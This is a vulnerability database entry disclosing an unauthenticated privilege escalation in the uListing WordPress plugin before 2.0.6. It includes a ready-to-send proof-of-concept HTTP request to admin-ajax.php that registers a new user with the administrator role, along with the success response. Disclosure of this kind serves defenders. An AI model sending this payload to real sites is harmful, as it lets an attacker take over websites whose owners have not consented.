Lucene search

K
wpexploitM0zeWPEX-ID:856B930E-0E76-4CE5-B714-62ABC6017488
HistoryJul 27, 2021 - 12:00 a.m.

uListing < 2.0.6 - Unauthenticated Privilege Escalation

2021-07-2700:00:00
m0ze
382

0.003 Low

EPSS

Percentile

71.3%

An Unauthenticated Privilege Escalation vulnerability was discovered in the uListing plugin through v2.0.5 for WordPress. User registration must be allowed on the target website.

PoC | Unauthenticated Privilege Escalation | Request:

POST /wp-admin/admin-ajax.php?action=stm_listing_register HTTP/2
Host: example.com
User-Agent: Mozilla/5.0
Content-Type: application/json;charset=utf-8
X-Requested-With: XMLHttpRequest
Content-Length: 205

{"login":"Visse","first_name":"Visse","last_name":"Visse","email":"[email protected]","role":"administrator","password":"admin","password_repeat":"admin","nonce":"ac88e123d8","custom_fields":{}}


PoC | Unauthenticated Privilege Escalation | Response:

{"errors":[],"message":"Registration completed successfully.","status":"success"}

0.003 Low

EPSS

Percentile

71.3%

Related for WPEX-ID:856B930E-0E76-4CE5-B714-62ABC6017488